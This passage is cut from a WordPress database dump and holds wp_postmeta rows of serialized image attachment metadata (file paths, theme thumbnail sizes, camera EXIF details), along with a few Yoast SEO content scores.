4:{s:4:\"file\";s:25:\"leonturkey02-1080x380.jpg\";s:5:\"width\";i:1080;s:6:\"height\";i:380;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:13:\"vantage-slide\";a:4:{s:4:\"file\";s:24:\"leonturkey02-960x480.jpg\";s:5:\"width\";i:960;s:6:\"height\";i:480;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"vantage-carousel\";a:4:{s:4:\"file\";s:24:\"leonturkey02-272x182.jpg\";s:5:\"width\";i:272;s:6:\"height\";i:182;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:17:\"vantage-grid-loop\";a:4:{s:4:\"file\";s:24:\"leonturkey02-436x272.jpg\";s:5:\"width\";i:436;s:6:\"height\";i:272;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"sow-carousel-default\";a:4:{s:4:\"file\";s:24:\"leonturkey02-272x182.jpg\";s:5:\"width\";i:272;s:6:\"height\";i:182;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:3:\"3.2\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:6:\"DSC-H2\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:10:\"1271835346\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"6\";s:3:\"iso\";s:2:\"80\";s:13:\"shutter_speed\";s:15:\"0.0166666666667\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),(726,81,'_yoast_wpseo_content_score','90'),(727,371,'_wp_attached_file','2017/01/20160522_070826.jpg'),(728,371,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1700;s:6:\"height\";i:1692;s:4:\"file\";s:27:\"2017/01/20160522_070826.jpg\";s:5:\"sizes\";a:12:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:27:\"20160522_070826-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:27:\"20160522_070826-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:27:\"20160522_070826-768x764.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:764;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:29:\"20160522_070826-1024x1019.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:1019;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:24:\"vantage-thumbnail-mobile\";a:4:{s:4:\"file\";s:27:\"20160522_070826-330x174.jpg\";s:5:\"width\";i:330;s:6:\"height\";i:174;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:35:\"vantage-thumbnail-no-sidebar-mobile\";a:4:{s:4:\"file\";s:27:\"20160522_070826-330x116.jpg\";s:5:\"width\";i:330;s:6:\"height\";i:116;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"post-thumbnail\";a:4:{s:4:\"file\";s:27:\"20160522_070826-720x380.jpg\";s:5:\"width\";i:720;s:6:\"height\";i:380;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:28:\"vantage-thumbnail-no-sidebar\";a:4:{s:4:\"file\";s:28:\"20160522_070826-1080x380.jpg\";s:5:\"width\";i:1080;s:6:\"height\";i:380;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:13:\"vantage-slide\";a:4:{s:4:\"file\";s:27:\"20160522_070826-960x480.jpg\";s:5:\"width\";i:960;s:6:\"height\";i:480;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"vantage-carousel\";a:4:{s:4:\"file\";s:27:\"20160522_070826-272x182.jpg\";s:5:\"width\";i:272;s:6:\"height\";i:182;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:17:\"vantage-grid-loop\";a:4:{s:4:\"file\";s:27:\"20160522_070826-436x272.jpg\";s:5:\"width\";i:436;s:6:\"height\";i:272;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"sow-carousel-default\";a:4:{s:4:\"file\";s:27:\"20160522_070826-272x182.jpg\";s:5:\"width\";i:272;s:6:\"height\";i:182;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:3:\"1.9\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:8:\"SM-G920V\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:3:\"4.3\";s:3:\"iso\";s:2:\"40\";s:13:\"shutter_speed\";s:15:\"0.0166666666667\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),(729,40,'_yoast_wpseo_content_score','60'),(736,378,'_wp_attached_file','2017/01/DSCN3937.jpg'),(737,378,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:3648;s:6:\"height\";i:2736;s:4:\"file\";s:20:\"2017/01/DSCN3937.jpg\";s:5:\"sizes\";a:12:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:20:\"DSCN3937-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:20:\"DSCN3937-300x225.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:225;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:20:\"DSCN3937-768x576.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:576;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:21:\"DSCN3937-1024x768.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:768;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:24:\"vantage-thumbnail-mobile\";a:4:{s:4:\"file\";s:20:\"DSCN3937-330x174.jpg\";s:5:\"width\";i:330;s:6:\"height\";i:174;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:35:\"vantage-thumbnail-no-sidebar-mobile\";a:4:{s:4:\"file\";s:20:\"DSCN3937-330x116.jpg\";s:5:\"width\";i:330;s:6:\"height\";i:116;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"post-thumbnail\";a:4:{s:4:\"file\";s:20:\"DSCN3937-720x380.jpg\";s:5:\"width\";i:720;s:6:\"height\";i:380;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:28:\"vantage-thumbnail-no-sidebar\";a:4:{s:4:\"file\";s:21:\"DSCN3937-1080x380.jpg\";s:5:\"width\";i:1080;s:6:\"height\";i:380;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:13:\"vantage-slide\";a:4:{s:4:\"file\";s:20:\"DSCN3937-960x480.jpg\";s:5:\"width\";i:960;s:6:\"height\";i:480;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"vantage-carousel\";a:4:{s:4:\"file\";s:20:\"DSCN3937-272x182.jpg\";s:5:\"width\";i:272;s:6:\"height\";i:182;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:17:\"vantage-grid-loop\";a:4:{s:4:\"file\";s:20:\"DSCN3937-436x272.jpg\";s:5:\"width\";i:436;s:6:\"height\";i:272;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"sow-carousel-default\";a:4:{s:4:\"file\";s:20:\"DSCN3937-272x182.jpg\";s:5:\"width\";i:272;s:6:\"height\";i:182;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:3:\"5.6\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:12:\"COOLPIX P100\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:10:\"1473689782\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:3:\"4.6\";s:3:\"iso\";s:3:\"160\";s:13:\"shutter_speed\";s:16:\"0.00513610683102\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),(738,379,'_wp_attached_file','2017/01/DSCN3938.jpg'),(739,379,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:3648;s:6:\"height\";i:2736;s:4:\"file\";s:20:\"2017/01/DSCN3938.jpg\";s:5:\"sizes\";a:12:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:20:\"DSCN3938-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:20:\"DSCN3938-300x225.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:225;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:20:\"DSCN3938-768x576.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:576;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:21:\"DSCN3938-1024x768.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:768;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:24:\"vantage-thumbnail-mobile\";a:4:{s:4:\"file\";s:20:\"DSCN3938-330x174.jpg\";s:5:\"width\";i:330;s:6:\"height\";i:174;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:35:\"vantage-thumbnail-no-sidebar-mobile\";a:4:{s:4:\"file\";s:20:\"DSCN3938-330x116.jpg\";s:5:\"width\";i:330;s:6:\"height\";i:116;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"post-thumbnail\";a:4:{s:4:\"file\";s:20:\"DSCN3938-720x380.jpg\";s:5:\"width\";i:720;s:6:\"height\";i:380;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:28:\"vantage-thumbnail-no-sidebar\";a:4:{s:4:\"file\";s:21:\"DSCN3938-1080x380.jpg\";s:5:\"width\";i:1080;s:6:\"height\";i:380;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:13:\"vantage-slide\";a:4:{s:4:\"file\";s:20:\"DSCN3938-960x480.jpg\";s:5:\"width\";i:960;s:6:\"height\";i:480;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"vantage-carousel\";a:4:{s:4:\"file\";s:20:\"DSCN3938-272x182.jpg\";s:5:\"width\";i:272;s:6:\"height\";i:182;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:17:\"vantage-grid-loop\";a:4:{s:4:\"file\";s:20:\"DSCN3938-436x272.jpg\";s:5:\"width\";i:436;s:6:\"height\";i:272;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"sow-carousel-default\";a:4:{s:4:\"file\";s:20:\"DSCN3938-272x182.jpg\";s:5:\"width\";i:272;s:6:\"height\";i:182;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"5\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:12:\"COOLPIX P100\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:10:\"1473689831\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:3:\"4.6\";s:3:\"iso\";s:3:\"160\";s:13:\"shutter_speed\";s:16:\"0.00523286237572\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),(740,380,'_wp_attached_file','2017/01/DSCN3939.jpg'),(741,380,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:3648;s:6:\"height\";i:2736;s:4:\"file\";s:20:\"2017/01/DSCN3939.jpg\";s:5:\"sizes\";a:12:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:20:\"DSCN3939-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:20:\"DSCN3939-300x225.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:225;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:20:\"DSCN3939-768x576.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:576;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:21:\"DSCN3939-1024x768.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:768;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:24:\"vantage-thumbnail-mobile\";a:4:{s:4:\"file\";s:20:\"DSCN3939-330x174.jpg\";s:5:\"width\";i:330;s:6:\"height\";i:174;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:35:\"vantage-thumbnail-no-sidebar-mobile\";a:4:{s:4:\"file\";s:20:\"DSCN3939-330x116.jpg\";s:5:\"width\";i:330;s:6:\"height\";i:116;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"post-thumbnail\";a:4:{s:4:\"file\";s:20:\"DSCN3939-720x380.jpg\";s:5:\"width\";i:720;s:6:\"height\";i:380;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:28:\"vantage-thumbnail-no-sidebar\";a:4:{s:4:\"file\";s:21:\"DSCN3939-1080x380.jpg\";s:5:\"width\";i:1080;s:6:\"height\";i:380;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:13:\"vantage-slide\";a:4:{s:4:\"file\";s:20:\"DSCN3939-960x480.jpg\";s:5:\"width\";i:960;s:6:\"height\";i:480;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"vantage-carousel\";a:4:{s:4:\"file\";s:20:\"DSCN3939-272x182.jpg\";s:5:\"width\";i:272;s:6:\"height\";i:182;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:17:\"vantage-grid-loop\";a:4:{s:4:\"file\";s:20:\"DSCN3939-436x272.jpg\";s:5:\"width\";i:436;s:6:\"height\";i:272;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"sow-carousel-default\";a:4:{s:4:\"file\";s:20:\"DSCN3939-272x182.jpg\";s:5:\"width\";i:272;s:6:\"height\";i:182;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:3:\"2.8\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:12:\"COOLPIX P100\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:10:\"1473689841\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:3:\"4.6\";s:3:\"iso\";s:3:\"400\";s:13:\"shutter_speed\";s:15:\"0.0724637681159\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),(742,381,'_wp_attached_file','2017/01/DSCN3941.jpg'),(743,381,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:3648;s:6:\"height\";i:2736;s:4:\"file\";s:20:\"2017/01/DSCN3941.jpg\";s:5:\"sizes\";a:12:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:20:\"DSCN3941-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:20:\"DSCN3941-300x225.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:225;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:20:\"DSCN3941-768x576.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:576;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:21:\"DSCN3941-1024x768.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:768;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:24:\"vantage-thumbnail-mobile\";a:4:{s:4:\"file\";s:20:\"DSCN3941-330x174.jpg\";s:5:\"width\";i:330;s:6:\"height\";i:174;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:35:\"vantage-thumbnail-no-sidebar-mobile\";a:4:{s:4:\"file\";s:20:\"DSCN3941-330x116.jpg\";s:5:\"width\";i:330;s:6:\"height\";i:116;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"post-thumbnail\";a:4:{s:4:\"file\";s:20:\"DSCN3941-720x380.jpg\";s:5:\"width\";i:720;s:6:\"height\";i:380;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:28:\"vantage-thumbnail-no-sidebar\";a:4:{s:4:\"file\";s:21:\"DSCN3941-1080x380.jpg\";s:5:\"width\";i:1080;s:6:\"height\";i:380;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:13:\"vantage-slide\";a:4:{s:4:\"file\";s:20:\"DSCN3941-960x480.jpg\";s:5:\"width\";i:960;s:6:\"height\";i:480;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"vantage-carousel\";a:4:{s:4:\"file\";s:20:\"DSCN3941-272x182.jpg\";s:5:\"width\";i:272;s:6:\"height\";i:182;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:17:\"vantage-grid-loop\";a:4:{s:4:\"file\";s:20:\"DSCN3941-436x272.jpg\";s:5:\"width\";i:436;s:6:\"height\";i:272;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"sow-carousel-default\";a:4:{s:4:\"file\";s:20:\"DSCN3941-272x182.jpg\";s:5:\"width\";i:272;s:6:\"height\";i:182;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:3:\"2.8\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:12:\"COOLPIX P100\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:10:\"1473689857\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:3:\"4.6\";s:3:\"iso\";s:3:\"400\";s:13:\"shutter_speed\";s:15:\"0.0675675675676\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),(744,382,'_wp_attached_file','2017/01/DSCN3942.jpg'),(745,382,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:3648;s:6:\"height\";i:2736;s:4:\"file\";s:20:\"2017/01/DSCN3942.jpg\";s:5:\"sizes\";a:12:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:20:\"DSCN3942-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:20:\"DSCN3942-300x225.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:225;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:20:\"DSCN3942-768x576.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:576;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:21:\"DSCN3942-1024x768.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:768;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:24:\"vantage-thumbnail-mobile\";a:4:{s:4:\"file\";s:20:\"DSCN3942-330x174.jpg\";s:5:\"width\";i:330;s:6:\"height\";i:174;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:35:\"vantage-thumbnail-no-sidebar-mobile\";a:4:{s:4:\"file\";s:20:\"DSCN3942-330x116.jpg\";s:5:\"width\";i:330;s:6:\"height\";i:116;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"post-thumbnail\";a:4:{s:4:\"file\";s:20:\"DSCN3942-720x380.jpg\";s:5:\"width\";i:720;s:6:\"height\";i:380;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:28:\"vantage-thumbnail-no-sidebar\";a:4:{s:4:\"file\";s:21:\"DSCN3942-1080x380.jpg\";s:5:\"width\";i:1080;s:6:\"height\";i:380;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:13:\"vantage-slide\";a:4:{s:4:\"file\";s:20:\"DSCN3942-960x480.jpg\";s:5:\"width\";i:960;s:6:\"height\";i:480;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"vantage-carousel\";a:4:{s:4:\"file\";s:20:\"DSCN3942-272x182.jpg\";s:5:\"width\";i:272;s:6:\"height\";i:182;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:17:\"vantage-grid-loop\";a:4:{s:4:\"file\";s:20:\"DSCN3942-436x272.jpg\";s:5:\"width\";i:436;s:6:\"height\";i:272;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"sow-carousel-default\";a:4:{s:4:\"file\";s:20:\"DSCN3942-272x182.jpg\";s:5:\"width\";i:272;s:6:\"height\";i:182;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:3:\"2.8\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:12:\"COOLPIX P100\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:10:\"1473689886\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:3:\"4.6\";s:3:\"iso\";s:3:\"400\";s:13:\"shutter_speed\";s:15:\"0.0735294117647\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),(746,383,'_wp_attached_file','2017/01/DSCN3943.jpg'),(747,383,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:3648;s:6:\"height\";i:2736;s:4:\"file\";s:20:\"2017/01/DSCN3943.jpg\";s:5:\"sizes\";a:12:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:20:\"DSCN3943-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:20:\"DSCN3943-300x225.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:225;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:20:\"DSCN3943-768x576.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:576;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:21:\"DSCN3943-1024x768.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:768;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:24:\"vantage-thumbnail-mobile\";a:4:{s:4:\"file\";s:20:\"DSCN3943-330x174.jpg\";s:5:\"width\";i:330;s:6:\"height\";i:174;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:35:\"vantage-thumbnail-no-sidebar-mobile\";a:4:{s:4:\"file\";s:20:\"DSCN3943-330x116.jpg\";s:5:\"width\";i:330;s:6:\"height\";i:116;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"post-thumbnail\";a:4:{s:4:\"file\";s:20:\"DSCN3943-720x380.jpg\";s:5:\"width\";i:720;s:6:\"height\";i:380;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:28:\"vantage-thumbnail-no-sidebar\";a:4:{s:4:\"file\";s:21:\"DSCN3943-1080x380.jpg\";s:5:\"width\";i:1080;s:6:\"height\";i:380;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:13:\"vantage-slide\";a:4:{s:4:\"file\";s:20:\"DSCN3943-960x480.jpg\";s:5:\"width\";i:960;s:6:\"height\";i:480;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"vantage-carousel\";a:4:{s:4:\"file\";s:20:\"DSCN3943-272x182.jpg\";s:5:\"width\";i:272;s:6:\"height\";i:182;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:17:\"vantage-grid-loop\";a:4:{s:4:\"file\";s:20:\"DSCN3943-436x272.jpg\";s:5:\"width\";i:436;s:6:\"height\";i:272;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"sow-carousel-default\";a:4:{s:4:\"file\";s:20:\"DSCN3943-272x182.jpg\";s:5:\"width\";i:272;s:6:\"height\";i:182;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:3:\"2.8\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:12:\"COOLPIX P100\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:10:\"1473689895\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:3:\"4.6\";s:3:\"iso\";s:3:\"400\";s:13:\"shutter_speed\";s:14:\"0.117647058824\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),(748,384,'_wp_attached_file','2017/01/DSCN3944.jpg'),(749,384,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:3648;s:6:\"height\";i:2736;s:4:\"file\";s:20:\"2017/01/DSCN3944.jpg\";s:5:\"sizes\";a:12:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:20:\"DSCN3944-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:20:\"DSCN3944-300x225.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:225;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:20:\"DSCN3944-768x576.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:576;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:21:\"DSCN3944-1024x768.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:768;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:24:\"vantage-thumbnail-mobile\";a:4:{s:4:\"file\";s:20:\"DSCN3944-330x174.jpg\";s:5:\"width\";i:330;s:6:\"height\";i:174;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:35:\"vantage-thumbnail-no-sidebar-mobile\";a:4:{s:4:\"file\";s:20:\"DSCN3944-330x116.jpg\";s:5:\"width\";i:330;s:6:\"height\";i:116;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"post-thumbnail\";a:4:{s:4:\"file\";s:20:\"DSCN3944-720x380.jpg\";s:5:\"width\";i:720;s:6:\"height\";i:380;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:28:\"vantage-thumbnail-no-sidebar\";a:4:{s:4:\"file\";s:21:\"DSCN3944-1080x380.jpg\";s:5:\"width\";i:1080;s:6:\"height\";i:380;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:13:\"vantage-slide\";a:4:{s:4:\"file\";s:20:\"DSCN3944-960x480.jpg\";s:5:\"width\";i:960;s:6:\"height\";i:480;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"vantage-carousel\";a:4:{s:4:\"file\";s:20:\"DSCN3944-272x182.jpg\";s:5:\"width\";i:272;s:6:\"height\";i:182;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:17:\"vantage-grid-loop\";a:4:{s:4:\"file\";s:20:\"DSCN3944-436x272.jpg\";s:5:\"width\";i:436;s:6:\"height\";i:272;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"sow-carousel-default\";a:4:{s:4:\"file\";s:20:\"DSCN3944-272x182.jpg\";s:5:\"width\";i:272;s:6:\"height\";i:182;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:3:\"2.8\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:12:\"COOLPIX P100\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:10:\"1473689902\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:3:\"4.6\";s:3:\"iso\";s:3:\"329\";s:13:\"shutter_speed\";s:15:\"0.0333333333333\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),(750,385,'_wp_attached_file','2017/01/DSCN3945.jpg'),(751,385,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:3648;s:6:\"height\";i:2736;s:4:\"file\";s:20:\"2017/01/DSCN3945.jpg\";s:5:\"sizes\";a:12:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:20:\"DSCN3945-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:20:\"DSCN3945-300x225.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:225;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:20:\"DSCN3945-768x576.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:576;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:21:\"DSCN3945-1024x768.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:768;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:24:\"vantage-thumbnail-mobile\";a:4:{s:4:\"file\";s:20:\"DSCN3945-330x174.jpg\";s:5:\"width\";i:330;s:6:\"height\";i:174;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:35:\"vantage-thumbnail-no-sidebar-mobile\";a:4:{s:4:\"file\";s:20:\"DSCN3945-330x116.jpg\";s:5:\"width\";i:330;s:6:\"height\";i:116;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"post-thumbnail\";a:4:{s:4:\"file\";s:20:\"DS